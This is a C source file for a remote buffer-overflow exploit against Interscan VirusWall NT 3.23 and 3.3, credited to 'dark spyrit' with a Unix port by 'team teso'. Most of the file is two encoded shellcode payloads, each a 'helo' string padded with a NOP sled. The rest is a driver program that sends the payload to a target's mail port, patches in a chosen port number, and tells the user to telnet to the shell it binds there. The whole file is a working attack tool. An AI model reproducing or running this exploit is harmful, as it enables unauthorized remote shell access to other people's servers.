/* Interscan VirusWall 3.23/3.3 remote
 * by dark spyrit <dspyrit@beavuh.org>
 * quick unix port by team teso (http://teso.scene.at/).
 *
 * further information at http://www.beavuh.org.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


/* local functions
 */
void			usage (void);
unsigned long int	net_resolve (char *host);
int			net_connect (struct sockaddr_in *cs, char *server,
	unsigned short int port, int sec);

/* shellcode by dark spyrit
 */
unsigned long	sploit_323_len = 1314;
unsigned char	sploit_323[] =
	"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\xbb\x10\x0b\x11\x01\xc1\xeb"
	"\x02\x8b\xf8\x33\xc0\x50\x48\x90\x50\x59\xf2\xaf"
	"\x59\xb1\xc6\x8b\xc7\x48\x80\x30\x99\xe2\xfa\x33"
	"\xf6\x96\x90\x90\x56\xff\x13\x8b\xd0\xfc\x33\xc9"
	"\xb1\x0b\x49\x32\xc0\xac\x84\xc0\x75\xf9\x52\x51"
	"\x56\x52\x66\xbb\x34\x43\xff\x13\xab\x59\x5a\xe2"
	"\xec\x32\xc0\xac\x84\xc0\x75\xf9\x66\xbb\xc4\x42"
	"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x06\x32\xc0"
	"\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\x66\xbb\x34"
	"\x43\xff\x13\xab\x59\x5a\xe2\xec\x83\xc6\x05\x33"
	"\xc0\x50\x40\x50\x40\x50\xff\x57\xe8\x93\x6a\x10"
	"\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33"
	"\xc0\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x48"
	"\x50\x57\x56\xad\x56\xff\x57\xc0\x48\x50\x57\xad"
	"\x56\xad\x56\xff\x57\xc0\x48\xb0\x44\x89\x07\x57"
	"\xff\x57\xc4\x33\xc0\x8b\x46\xf4\x89\x47\x3c\x89"
	"\x47\x40\x8b\x06\x89\x47\x38\x33\xc0\x66\xb8\x01"
	"\x01\x89\x47\x2c\x57\x57\x33\xc0\x50\x50\x50\x40"
	"\x50\x48\x50\x50\xad\x56\x33\xc0\x50\xff\x57\xc8"
	"\xff\x76\xf0\xff\x57\xcc\xff\x76\xfc\xff\x57\xcc"
	"\x48\x50\x50\x53\xff\x57\xf4\x8b\xd8\x33\xc0\xb4"
	"\x04\x50\xc1\xe8\x04\x50\xff\x57\xd4\x8b\xf0\x33"
	"\xc0\x8b\xc8\xb5\x04\x50\x50\x57\x51\x50\xff\x77"
	"\xa8\xff\x57\xd0\x83\x3f\x01\x7c\x22\x33\xc0\x50"
	"\x57\xff\x37\x56\xff\x77\xa8\xff\x57\xdc\x0b\xc0"
	"\x74\x2f\x33\xc0\x50\xff\x37\x56\x53\xff\x57\xf8"
	"\x6a\x50\xff\x57\xe0\xeb\xc8\x33\xc0\x50\xb4\x04"
	"\x50\x56\x53\xff\x57\xfc\x57\x33\xc9\x51\x50\x56"
	"\xff\x77\xac\xff\x57\xd8\x6a\x50\xff\x57\xe0\xeb"
	"\xaa\x50\xff\x57\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5"
	"\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9"
	"\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9"
	"\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc"
	"\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6"
	"\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc"
	"\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde"
	"\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce"
	"\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8"
	"\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99"
	"\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99"
	"\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2"
	"\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed"
	"\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc"
	"\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x9b\x99"
	"\xff\xff"	/* 16 bit remote port number */
	"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
	"\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xff\xff\xff\xff"
	"\x60\x45\x42\x00\x0d\x0a";

unsigned long	sploit_33_len = 794;
unsigned char	sploit_33[] =
	"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4b\x8b"
	"\xc3\xbb\x01\x90\x16\x01\xc1\xeb\x02\x8b\xf8\x33"
	"\xc0\x50\x48\x90\x50\x59\xf2\xaf\x59\xb1\xc6\x8b"
	"\xc7\x48\x80\x30\x99\xe2\xfa\x33\xf6\x96\x90\x90"
	"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x0b\x49\x32"
	"\xc0\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\xb3\x80"
	"\x90\x90\xff\x13\xab\x59\x5a\xe2\xec\x32\xc0\xac"
	"\x84\xc0\x75\xf9\xb3\x01\x4b\x90\x56\xff\x13\x8b"
	"\xd0\xfc\x33\xc9\xb1\x06\x32\xc0\xac\x84\xc0\x75"
	"\xf9\x52\x51\x56\x52\xb3\x80\x90\x90\xff\x13\xab"
	"\x59\x5a\xe2\xec\x83\xc6\x05\x33\xc0\x50\x40\x50"
	"\x40\x50\xff\x57\xe8\x93\x6a\x10\x56\x53\xff\x57"
	"\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0\x57\x50\xb0"
	"\x0c\xab\x58\xab\x40\xab\x5f\x48\x50\x57\x56\xad"
	"\x56\xff\x57\xc0\x48\x50\x57\xad\x56\xad\x56\xff"
	"\x57\xc0\x48\xb0\x44\x89\x07\x57\xff\x57\xc4\x33"
	"\xc0\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\x8b\x06"
	"\x89\x47\x38\x33\xc0\x66\xb8\x01\x01\x89\x47\x2c"
	"\x57\x57\x33\xc0\x50\x50\x50\x40\x50\x48\x50\x50"
	"\xad\x56\x33\xc0\x50\xff\x57\xc8\xff\x76\xf0\xff"
	"\x57\xcc\xff\x76\xfc\xff\x57\xcc\x48\x50\x50\x53"
	"\xff\x57\xf4\x8b\xd8\x33\xc0\xb4\x04\x50\xc1\xe8"
	"\x04\x50\xff\x57\xd4\x8b\xf0\x33\xc0\x8b\xc8\xb5"
	"\x04\x50\x50\x57\x51\x50\xff\x77\xa8\xff\x57\xd0"
	"\x83\x3f\x01\x7c\x22\x33\xc0\x50\x57\xff\x37\x56"
	"\xff\x77\xa8\xff\x57\xdc\x0b\xc0\x74\x2f\x33\xc0"
	"\x50\xff\x37\x56\x53\xff\x57\xf8\x6a\x50\xff\x57"
	"\xe0\xeb\xc8\x33\xc0\x50\xb4\x04\x50\x56\x53\xff"
	"\x57\xfc\x57\x33\xc9\x51\x50\x56\xff\x77\xac\xff"
	"\x57\xd8\x6a\x50\xff\x57\xe0\xeb\xaa\x50\xff\x57"
	"\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda"
	"\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc"
	"\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6"
	"\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa"
	"\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8"
	"\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4"
	"\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8"
	"\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc"
	"\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5"
	"\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xdc\xe1\xf0\xed"
	"\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xce\xca\xd6\xda"
	"\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb"
	"\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8"
	"\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb"
	"\xfc\xfa\xef\x99\x9b\x99"
	"\xff\xff"	/* sploit port number */
	"\x99\x99\x99\x99"
	"\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\xb7"
	"\xfc\xe1\xfc\x99\xff\xff\xff\xff\x09\x1f\x40\x00"
	"\x0d\x0ah";


void
usage (void)
{
	printf ("Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.\n"
	"by dark spyrit <dspyrit@beavuh.org>\n"
	"quick unix port by team teso\n\n"
	"usage: vwxploit <host> <port> <port to bind shell> <version>\n"
	"eg - vwxploit host.com 25 1234 3.23\n");

	exit (EXIT_FAILURE);
}

int
main (int argc, char **argv)
{
	int			socket;
	unsigned char		*shellcode;
	unsigned char		*sh_port_offset;
	char			*server;
	unsigned short int	port_dest, port_shell;
	size_t			sh_len;
	struct sockaddr_in	sa;

	if (argc != 5)
		usage ();

	server = argv[1];
	port_dest = atoi (argv[2]);
	port_shell = atoi (argv[3]);
	if (port_dest == 0 || port_shell == 0)
		usage ();

	if (strcmp (argv[4], "3.23") == 0) {
		shellcode = sploit_323;
		sh_len = sploit_323_len;
		sh_port_offset = sploit_323 + 1282;
	} else if (strcmp (argv[4], "3.3") == 0) {
		shellcode = sploit_33;
		sh_len = sploit_33_len;
		sh_port_offset = sploit_33 + 762;
	} else {
		fprintf (stderr, "unsupported version\n");
		exit (EXIT_FAILURE);
	}

	port_shell ^= 0x9999;
	*sh_port_offset = (char) ((port_shell >> 8) & 0xff);
	*(sh_port_offset + 1) = (char) (port_shell & 0xff);

	socket = net_connect (&sa, server, port_dest, 45);
	if (socket <= 0) {
		perror ("net_connect");
		exit (EXIT_FAILURE);
	}

	write (socket, shellcode, sh_len);
	sleep (1);
	close (socket);

	printf ("data send, try \"telnet %s %d\" now\n",
		argv[1], atoi (argv[3]));

	exit (EXIT_SUCCESS);
}

unsigned long int
net_resolve (char *host)
{
	long		i;
	struct hostent	*he;

	i = inet_addr (host);
	if (i == -1) {
		he = gethostbyname (host);
		if (he == NULL) {
			return (0);
		} else {
			return (*(unsigned long *) he->h_addr);
		}
	}

	return (i);
}


int
net_connect (struct sockaddr_in *cs, char *server,
	unsigned short int port, int sec)
{
	int		n, len, error, flags;
	int		fd;
	struct timeval	tv;
	fd_set		rset, wset;

	/* first allocate a socket */
	cs->sin_family = AF_INET;
	cs->sin_port = htons (port);
	fd = socket (cs->sin_family, SOCK_STREAM, 0);
	if (fd == -1)
		return (-1);

	cs->sin_addr.s_addr = net_resolve (server);
	if (cs->sin_addr.s_addr == 0) {
		close (fd);
		return (-1);
	}

	flags = fcntl (fd, F_GETFL, 0);
	if (flags == -1) {
		close (fd);
		return (-1);
	}
	n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
	if (n == -1) {
		close (fd);
		return (-1);
	}

	error = 0;

	n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
	if (n < 0) {
		if (errno != EINPROGRESS) {
			close (fd);
			return (-1);
		}
	}
	if (n == 0)
		goto done;

	FD_ZERO(&rset);
	FD_ZERO(&wset);
	FD_SET(fd, &rset);
	FD_SET(fd, &wset);
	tv.tv_sec = sec;
	tv.tv_usec = 0;

	n = select(fd + 1, &rset, &wset, NULL, &tv);
	if (n == 0) {
		close(fd);
		errno = ETIMEDOUT;
		return (-1);
	}
	if (n == -1)
		return (-1);

	if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
		if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
			len = sizeof(error);
			if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
				errno = ETIMEDOUT;
				return (-1);
			}
			if (error == 0) {
				goto done;
			} else {
				errno = error;
				return (-1);
			}
		}
	} else
		return (-1);

done:
	n = fcntl(fd, F_SETFL, flags);
	if (n == -1)
		return (-1);

	return (fd);
}